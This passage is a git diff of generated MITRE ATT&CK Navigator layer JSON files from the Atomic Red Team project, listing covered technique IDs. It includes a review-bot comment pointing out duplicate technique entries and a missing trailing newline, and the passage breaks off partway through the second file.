diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
index 03b04c3f..89915caf 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
@@ -1 +1 @@
-{"version":"3.0","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqu
eID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,
"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":
true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"ena
bled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":tru
e},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"3.0","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqu
eID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,
"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":
true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"ena
bled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":tru
e},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]}
\ No newline at end of file
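Review bot: The new side of this hunk now carries `{"techniqueID":"T1555","score":100,"enabled":true}` twice in a row, directly after the T1555.003 entry, and the layer already repeats several parent IDs the same way (T1003, T1027, T1055, T1070, T1216, T1218, T1518, T1560), so the duplicate is a pattern rather than a one-off. Navigator layer entries without a `tactic` are, as far as I know, keyed by `techniqueID` alone, so duplicates add nothing and leave it to the consumer which copy's score and enabled flag wins; RFC 7493-style strictness elsewhere in the toolchain may also reject them. This file looks generated from the atomics index, so the fix presumably belongs in the generator — deduplicate the collected technique IDs (a set keyed by techniqueID) before emitting the `techniques` array — rather than a hand edit of this JSON. Emitting a trailing newline from the same generator would also stop every regeneration from carrying the `\ No newline at end of file` marker.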
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index dc96ba52..323bade4 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@
-{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1
037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"ena
bled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":10
0,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"e